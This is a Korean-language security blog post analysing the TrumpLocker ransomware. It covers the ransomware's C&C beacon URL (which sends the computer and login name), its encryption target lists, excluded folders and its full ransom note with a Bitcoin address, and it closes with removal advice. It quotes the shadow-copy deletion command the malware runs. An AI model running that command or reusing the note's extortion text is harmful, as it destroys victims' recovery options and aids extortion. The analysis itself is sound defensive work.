일단 트럼프 대통령에 대해 간단하게 알아보겠습니다. 일단 미국 45대 대통령이기도 하면서 MAKE AMERICA GREAT AGAIN 미국을 다시 위대하게 슬로건을 내걸었던 분이기도 합니다.
2014년에 ALS 아이스 버킷 챌린지 때에는 미스유니버스와 미스 USA가 트럼프에 물은 적이 있으며 모델 에이전시도 가진 분이고 하고 한때에는 WWE 에서도 활약을 했던 분이기도 하고 버락 오바마의 건강보험개혁법(오바마케어)의 개정령을 발동한 분이기도 하고 TPP(환태평양 경제동반자 협정)탈퇴, 미국-멕시코 국경 장벽 설치 등이 있을 것입니다. 그럼 본론으로 돌아가 TrumpLocker에 대해 알아보는 시간을 가져보겠습니다. 일단 기본적으로 해당 랜섬웨어는 보면 VenusLocker하고 비슷하게 만들어진 것을 볼 수가 있습니다.
즉 추측을 하는 방법으로는 해당 VenusLocker를 만든 쪽에서 만들어졌는지 아니며 다른 누군가가 금전적인 이익을 얻으려고 만든 것이지 알 수가 없습니다. 일단 해당 TrumpLocker에 감염이 되며 TrumpLocker.exe이라는 파일이 생성되면서 시작이 됩니다. 그리고 C&C 서버에 접속하기 위해서 접속을 시작합니다.
https://3q27hfpradjovwyo.onion.cab/ran/gen.php?u=[computer-name]\[login-name]
그리고 공개키로 사용자의 컴퓨터를 검색을 통해서 파일들을 암호화를 진행하게 되고 몸값은 미국 달러와 Bitcoin으로 암호화를 진행됩니다. 대략 몸값은 165달러인 Bitcoin 0.145로 돈을 요구합니다.
그리고 해당 TrumpLocker는 다른 랜섬웨어와 다르게 암호화하는 파일 등이 정해져 있습니다. 그러나 여기서 또 다른 점은 TrumpLocker 특정 파일 형식을 완전히 암호화하는 반면에 다른 형식 파일 처음 부분은 1024바이트로만 암호화가 진행됩니다. 그리고 암호화가 진행되고 나면 끝이. TheTrumpLockerf이라는 확장자를 추가를 해버리는 것이 특징입니다.
.txt,.ini,.php,.html,.css,.py,.c,.cpp,.cc, .h, .cs, .log, .pl,.java,.doc,.dot, .docx, .docm, .dotx, .dotm, .rtf, .wpd, .docb, .wps, .msg, .xls, .xlt, .xlm, .xlsx, .xlsm, .xltx,.xltm, xlsb,.xla,.xlam, .xll, .xlw, .ppt, .pot, .pps, .pptx, .pptm, .potx, .potm, .ppam, .ppsx, .ppsm, .sldx, .sldm, .class, .jar, .csv, .xml, .dwg, .dxf, .asp
그리고 마찬가지로 사용자 컴퓨터에서 아래와 같은 파일 형식을 검색하고 나서 암호화를 진행합니다. 그리고 나서 마찬가지로. TheTrumpLockerp확장을 추가를 진행하게 됩니다
.asf, .pdf, .xls, .docx, .xlsx, .mp3, .waw, .jpg, .jpeg, .txt, .rtf, .doc, .rar, .zip, .psd, .tif, .wma, .gif, .bmp, .ppt, .pptx, .docm, .xlsm, .pps, .ppsx, .ppd, .eps, .png, .ace, .djvu, .tar, .cdr, .max, .wmv, .avi, .wav, .mp4, .pdd, .php, .aac, .ac3, .amf, .amr, .dwg, .dxf, .accdb, .mod, .tax2013, .tax2014, .oga, .ogg, .pbf, .ra, .raw, .saf, .val, .wave, .wow, .wpk, .3g2, .3gp, .3gp2, .3mm, .amx, .rpt, .avs, .bik, .dir, .divx, .dvx, .evo, .flv, .qtq, .tch, .rts, .rum, .rv, .scn, .srt, .stx, .svi, .swf, .trp, .vdo, .wm, .wmd, .wmmp, .wmx, .wvx, .xvid, .3d, .3d4, .3df8, .pbs, .adi, .ais, .amu, .arr, .bmc, .bmf, .cag, .cam, .dng, .ink, .ini, .jif, .jiff, .jpc, .jpf, .jpw, .mag, .mic, .mip, .msp, .nav, .ncd, .odc, .odi, .opf, .qif, .xwd, .abw, .act, .adt, .aim, .ans, .asc, .ase, .bdp, .bdr, .bib, .boc, .crd, .diz, .dot, .dotm, .dotx, .dvi, .dxe, .mlx, .err, .euc, .faq, .fdr, .fds, .gthr, .idx, .kwd, .lp2, .ltr, .man, .mbox, .msg, .nfo, .now, .odm, .oft, .pwi, .rng, .rtx, .run, .ssa, .text, .unx, .wbk, .wsh, .7z, .arc, .ari, .arj, .car, .cbr, .cbz, .gz, .gzig, .jgz, .pak, .pcv, .puz, .rev, .sdn, .sen, .sfs, .sfx, .sh, .shar, .shr, .sqx, .tbz2, .tg, .tlz, .vsi, .wad, .war, .xpi, .z02, .z04, .zap, .zipx, .zoo, .ipa, .isu, .jar, .js, .udf, .adr, .ap, .aro, .asa, .ascx, .ashx, .asmx, .asp, .indd, .asr, .qbb, .bml, .cer, .cms, .crt, .dap, .htm, .moz, .svr, .url, .wdgt, .abk, .bic, .big, .blp, .bsp, .cgf, .chk, .col, .cty, .dem, .elf, .ff, .gam, .grf, .h3m, .h4r, .iwd, .ldb, .lgp, .lvl, .map, .md3, .mdl, .nds, .pbp, .ppf, .pwf, .pxp, .sad, .sav, .scm, .scx, .sdt, .spr, .sud, .uax, .umx, .unr, .uop, .usa, .usx, .ut2, .ut3, .utc, .utx, .uvx, .uxx, .vmf, .vtf, .w3g, .w3x, .wtd, .wtf, .ccd, .cd, .cso, .disk, .dmg, .dvd, .fcd, .flp, .img, .isz, .mdf, .mds, .nrg, .nri, .vcd, .vhd, .snp, .bkf, .ade, .adpb, .dic, .cch, .ctt, .dal, .ddc, .ddcx, .dex, .dif, .dii, .itdb, .itl, .kmz, .lcd, .lcf, .mbx, .mdn, .odf, .odp, .ods, .pab, .pkb, .pkh, .pot, .potx, .pptm, .psa, .qdf, .qel, .rgn, .rrt, .rsw, .rte, .sdb, .sdc, .sds, .sql, .stt, .tcx, .thmx, .txd, .txf, .upoi, .vmt, .wks, .wmdb, .xl, .xlc, .xlr, .xlsb, .xltx, .ltm, .xlwx, .mcd, .cap, .cc, .cod, .cp, .cpp, .cs, .csi, .dcp, .dcu, .dev, .dob, .dox, .dpk, .dpl, .dpr, .dsk, .dsp, .eql, .ex, .f90, .fla, .for, .fpp, .jav, .java, .lbi, .owl, .pl, .plc, .pli, .pm, .res, .rsrc, .so, .swd, .tpu, .tpx, .tu, .tur, .vc, .yab, .aip, .amxx, .ape, .api, .mxp, .oxt, .qpx, .qtr, .xla, .xlam, .xll, .xlv, .xpt, .cfg, .cwf, .dbb, .slt, .bp2, .bp3, .bpl, .clr, .dbx, .jc, .potm, .ppsm, .prc, .prt, .shw, .std, .ver, .wpl, .xlm, .yps, .1cd, .bck, .html, .bak, .odt, .pst, .log, .mpg, .mpeg, .odb, .wps, .xlk, .mdb, .dxg, .wpd, .wb2, .dbf, .ai, .3fr, .arw, .srf, .sr2, .bay, .crw, .cr2, .dcr, .kdc, .erf, .mef, .mrw, .nef, .nrw, .orf, .raf, .rwl, .rw2, .r3d, .ptx, .pef, .srw, .x3f, .der, .pem, .pfx, .p12, .p7b, .p7c, .jfif, .exif, .docb, .xlt, .xltm, .xlw, .ppam, .sldx, .sldm, .class, .db, .pdb, .dat, .csv, .xml, .spv, .grle, .sv5, .game, .slot, .aaf, .aep, .aepx, .plb, .prel, .prproj, .eat, .ppj, .indl, .indt, .indb, .inx, .idml, .pmd, .xqx, .svg, .as3, .as
그리고 TrumpLocker가 암호화를 진행할 때 먼저 파일 확장자 전체 암호화 목록에 있는지 먼저 확인을 진행하고 그리고 나서 동일한 확장자가 부분 목록에 있는지 없는지 관계없이 파일을 암호화를 진행을 됩니다. 그리고 원래 파일이름은 Base64로 인코딩을 한 다음 끝에 암호화된 확장자를 추가합니다. 그리고 암호화가 진행이 완료되면 사용자 컴퓨터 바탕화면에 친절하게 What happen to my files.txt라는 파일을 보여 줍니다.
그리고 What happen to my files.txt 파일에서는 다음과 같은 내용이 들어 있는 것을 확인할 수가 있습니다.
--- The Trump Locker ---
Unfortunately, you are hacked.
1. What happened to my files?
Your personal files, including your photos, documents, videos and other important files on this computer, have been encrypted with RSA-4096, the strongest encryption algorithm. RSA algorithm generates a public key and a private key for your computer. The public key was used to encrypt your files a moment ago. The private key is necessary for you to decrypt and recover your files. Now, your private key is stored on our secret Internet server. And there is no doubt that no one can recover your files without your private key.
For further information about RSA algorithm, please refer to https://en.wikipedia.org/wiki/RSA_(cryptosystem)
2. How to decrypt my files?
To decrypt and recover your files, you have to pay #ramt# US Dollars for the private key and decryption service. Please note that you have ONLY 72 HOURS to complete your payment. If your payment do not be completed within time limit, your private key will be deleted automatically by our server. All your files will be permanently encrypted and nobody can recover them. Therefore, it is advised that you'd better not waste your time, because there is no other way to recover your files except making a payment.
3. How to pay for my private key?
There are three steps to make a payment and recover your files:
1). For the security of transactions, all the payments must be completed via Bitcoin network. Thus, you need to exchange #ramt# US dollars (or equivalent local currencies) to Bitcoins, and then send these Bitcoins (about #btc# BTC) to the following address. 1N82pq3XovKoJYqUmTrRiXftpNHZyu4jyv
2). Send your personal ID to our official email: TheTrumpLocker@mail2tor.com
Your personal ID is: #id#
3). You will receive a decryptor and your private key to recover all your files within one working day.
4. What is Bitcoin?
Bitcoin is an innovative payment network and a new kind of money. It is based on an open-source cryptographic protocol that is independent of any central authority. Bitcoins can be transferred through a computer or a smartphone withour an intermediate financial institution.
5. How to make a payment with Bitcoin?
You can make a payment with Bitcoin based on Bitcoin Wallet or Based on Perfect Money. You can choose the way that is more convenient for you.
About Based on Bitcoin Wallet
1) Create a Bitcoin Wallet. We recommend Blockchain.info (https://blockchain.info/)
2) Buy necessary amount of Bitcoins. Our recommendations are as follows.
LocalBitcoins.com -- the fastest and easiest way to buy and sell Bitcoins.
CoinCafe.com -- the simplest and fastest way to buy, sell and use Bitcoins.
BTCDirect.eu -- the best for Europe.
CEX.IO -- Visa / MasterCard
CoinMama.com -- Visa / MasterCard
HowToBuyBitcoins.info -- discover quickly how to buy and sell Bitcoins in your local currency.
3) As mentioned above, send about #btc# BTC (equivalent to #ramt# USD) to our Bitcoin receiving address.
4) As mentioned above, and then, send us your personal ID via email, you will receive your private key soon.
About Based on Perfect Money
1) Create a Perfect Money account. (https://perfectmoney.is)
2) Visit to PMBitcoin.com. (https://pmbitcoin.com/btc)
input our Bitcoin receiving address in the \"Bitcoin Wallet\" textbox.
input #ramt# in the \"Amount\" textbox, the amount of Bitcoin will be calculated automatically.
click \"PAY\" button, then you can complete you payment with your Perfect Money account and local debit card.
6. If you have any problem, please feel free to contact us via official email.
Best Regards
The Trump Locker Team
그리고 uinf.uinf라는 파일을 하드디스크에 저장하고 나서 RansomNote.exe 프로그램에서 작동됩니다. 그리고 나서 TrumpLocker설치가 된 컴퓨터에서 RansomNote.exe라는 파일을 추출해서 사용자 바탕화면에 표시되는 방식입니다.
그리고 그리고 새도우 볼륨 복사본을 삭제해서 복구하는 것을 방지하기 위해서 미리 로컬 새도우 볼륨 사본을 삭제하는 명령어인
C:\\Windows\\system32\\wbem\\wmic.exe shadowcopy delete&exit를 수행을 하게 되고 인터넷이 연결돼 있으며 http://i.imgur.cxm/g4Ly4AD.jpg로 접속을 해서 사용자 바탕화면을 강제로 변경해줍니다.
그리고 마지막으로는 RansomNote.exe파일을 실행을 해서 도널드 트럼프 대통령이 흐뭇하게 웃는 대통령 사진에 YOU ARE HACKED!!이라는 메시지를 볼 수가 있게 만들어 줍니다. 아마도 해당 부분에 감염되면 공화당이든 민주당이든 간에 입에 욕 한 번 더 나올 것으로 생각합니다. 그리고 나서 다시 몸값을 요구하는 사이트로 이동합니다.
그리고 해당 랜섬웨어가 제외하는 폴더는 다음과 같습니다.
Program Files, Program Files (x86), Windows, Python27, Python34, AliWangWang, Avira, wamp, Avira, 360, ATI, Google, Intel, Internet Explorer, Kaspersky Lab, Microsoft Bing Pinyin, Microsoft Chart Controls, Microsoft Games, Microsoft Office, Microsoft.NET, MicrosoftBAF, MSBuild, QQMailPlugin, Realtek, Skype, Reference Assemblies, Tencent, USB Camera2, WinRAR, Windows Sidebar, Windows Portable Devices, Windows Photo Viewer, Windows NT, Windows Media Player, Windows Mail, NVIDIA Corporation, Adobe, IObit, AVAST Software, CCleaner, AVG, Mozilla Firefox, VirtualDJ, TeamViewer, ICQ, java, Yahoo!
일단 보면 일부 보안 업체들과 브라우저들도 포함이 되어져 있는 것을 볼 수가 있습니다. 일단 보면 미국 측 보안 업체들은 보이지 않는 걸로 보아서는 아마도 특정 국가 즉 미국을 노린 것이 아닐까 생각이 됩니다.
일단 보면 Avira, Kaspersky, IObit,AVAST,CCleaner,AVG,IObit,QQMailPlugin,Ten cent 같은 걸로 보아서는 해당 국가들이 독일, 러시아, 중국, 체코 등은 영향을 적게 받게 제작이 되지 않았나 생각이 됩니다. 그리고 NVIDIA, Realtek 같은 것을 제외한 것은 아마도 랜섬웨어가 감염이 되었으면 사용자에게 보여주기 위해서 제외처리가 된 것으로 생각이 됩니다.
바이러스 토탈 결과
치료 방법은 현재 보안 업체들에서 대응하고 있습니다. 일단 먼저 자신이 사용하는 백신프로그램은 반드시 실시간 감시 상태에서 업데이트를 진행을 합니다. 그리고 나서 전체 검사를 진행해줍니다.
그러면 대부분의 보안 업체에서는 Win32.Trump Locker,Adware.Trump Locker Ransomeware,Win32.Application .Trump Locker Ransomeware,.Trump Locker Ransomeware등으로 진단이 되고 있으며 해당 악성코드 등에 감염이 되기 싫은 경우에는 반드시 출처가 의심스러운 파일은 함부로 열지 말고 그리고 윈도우 업데이트등은 반드시 업데이트가 필요할 것입니다.
<기타 관련 글>
[보안(Security)] - ShadowExplorer(새도우 익스플러워)를 사용하여 랜섬웨어 복구 방법
[보안(Security)] - Ransomeware(랜섬웨어),Fake AV(가짜백신프로그럠) 대응 및 제거 방법
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
WebRTC 설정으로 인한 IP주소 노출 차단 방법 (4) | 2017.03.07 |
---|---|
Dharma Ransomware(Dharma 랜섬웨어)파일 암호화 복구툴 공개-Kaspersky RakhniDecryptor (2) | 2017.03.04 |
프린터 해킹로부터 해킹 예방 방법 (0) | 2017.03.03 |
CryptoMix 랜섬웨어 증상과 암호화 파일 복구 방법 (2) | 2017.02.28 |
노턴 인터넷 시큐리티 22.9.0.71 제품 업데이트 (0) | 2017.02.24 |
Windows 10 Version 1607 Adobe Flash Player 보안 업데이트(KB4010250)긴급 보안 업데이트 (0) | 2017.02.23 |
브라우저 하이재커 Mystart.dealwifi 제거 방법 (0) | 2017.02.21 |
러시아 해커와 연관된 아이폰 백업 파일을 빼돌리는 Mac OS용 악성코드 발견 (0) | 2017.02.17 |